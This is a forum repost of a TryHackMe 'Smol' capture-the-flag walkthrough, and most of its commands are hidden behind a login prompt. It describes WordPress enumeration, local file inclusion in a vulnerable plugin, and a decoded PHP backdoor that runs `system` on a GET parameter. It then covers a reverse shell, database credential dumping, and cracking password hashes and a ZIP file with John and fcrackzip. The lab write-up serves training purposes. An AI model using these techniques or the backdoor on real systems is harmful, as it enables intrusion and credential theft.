• Что бы вступить в ряды "Принятый кодер" Вам нужно:
    Написать 10 полезных сообщений или тем и Получить 10 симпатий.
    Для того кто не хочет терять время,может пожертвовать средства для поддержки сервеса, и вступить в ряды VIP на месяц, дополнительная информация в лс.

  • Пользаватели которые будут спамить, уходят в бан без предупреждения. Спам сообщения определяется администрацией и модератором.

  • Гость, Что бы Вы хотели увидеть на нашем Форуме? Изложить свои идеи и пожелания по улучшению форума Вы можете поделиться с нами здесь. ----> Перейдите сюда
  • Все пользователи не прошедшие проверку электронной почты будут заблокированы. Все вопросы с разблокировкой обращайтесь по адресу электронной почте : info@guardianelinks.com . Не пришло сообщение о проверке или о сбросе также сообщите нам.

TryHackMe: Smol

Lomanu4 Оффлайн

Lomanu4

Команда форума
Администратор
Регистрация
1 Мар 2015
Сообщения
1,481
Баллы
155
At the heart of Smol is a WordPress website, a common target due to its extensive plugin ecosystem. The machine showcases a publicly known vulnerable plugin, highlighting the risks of neglecting software updates and security patches. Enhancing the learning experience, Smol introduces a backdoored plugin, emphasizing the significance of meticulous code inspection before integrating third-party components.

Quick Tips: Do you know that on computers without GPU like the AttackBox, John The Ripper is faster than Hashcat?

Note: Please allow 4 minutes for the VM to fully boot up.

Flag 1


What is the user flag?

We first add <MACHINE IP>

Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.

in /etc/hosts to resolve the hostname.

Run wpscan --url

Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.

--plugins-detection passive -e ap.

We see the plugin enumerated is jsmol2wp, last updated in 2018. That is already a bad sign.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



With further searches on Google, we see that it is vulnerable to local file inclusion.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Credit:

Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



We can then exploit using the URL

Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.




Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



We can use those credentials to get a login.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.




Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



As we look at Profile -> Pages -> Webmaster Tasks!!, we see that the author uses Hello Dolly plugin.

As we look it up on GitHub, we see that the plugin uses the hello.php page.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



We can access the page using LFI like

Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.

.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Within the PHP file, we see this.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



When Base64 decoded, we get this.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



To which the code will look like this when decoded in ASCII.


if (isset($_GET["cmd"])) {
system($_GET["cmd"]);
}

As we can see, there is room for remote code execution here.

As we navigate to the Dashboard, we see a message mentioning Dolly, indicating that Dolly is currently being used.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



We can test the RCE vulnerability here. And sure enough, we get something back.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



I then set up a listener on my machine and did a reverse shell to exploit the RCE.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.




Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



We can then run ps auxww to check for any interesting processes running. We see that MySQL is running as seen below.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



We can then run mysql -u wpuser -p then input the same password as before. And we get access the database.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



I played around with the database a little bit, and eventually found these commands lead us to the credentials.


use wordpress;
select * from wp_users;


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



We then save all into a file. In my case I saved it as hashes.txt and crack it using JohnTheRipper by running john --format=phpass --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt.

We cracked our first one.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



We then login using that password as diego.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



navigate to /home/diego to get the flag.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Flag 2


What is the root flag?

As we check out think user's directory, we see that we can access the SSH key.

We can log in as think by running ssh think@www.smol.thm -i id_rsa.

After logging in as think, we can su gege to log in as gege, as gege has a ZIP file for us to investigate, as it is password protected.

We then export the ZIP file to our attacker machine for us to crack it.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.




Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.


We then run fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt wordpress.old.zip.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



We can then use the cracked password to unzip the file.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



After that, we see 1 file that caught our eye.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Upon reading that file, we see the credentials for xavi.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



And now we are xavi.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



As we ran sudo -l, we see that we can run sudo with everything, meaning we are essentially root once we run a command such as sudo su.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.




Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.



We then navigate to /root to get the flag.


Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.




Пожалуйста Авторизируйтесь или Зарегистрируйтесь для просмотра скрытого текста.

 
Вверх Снизу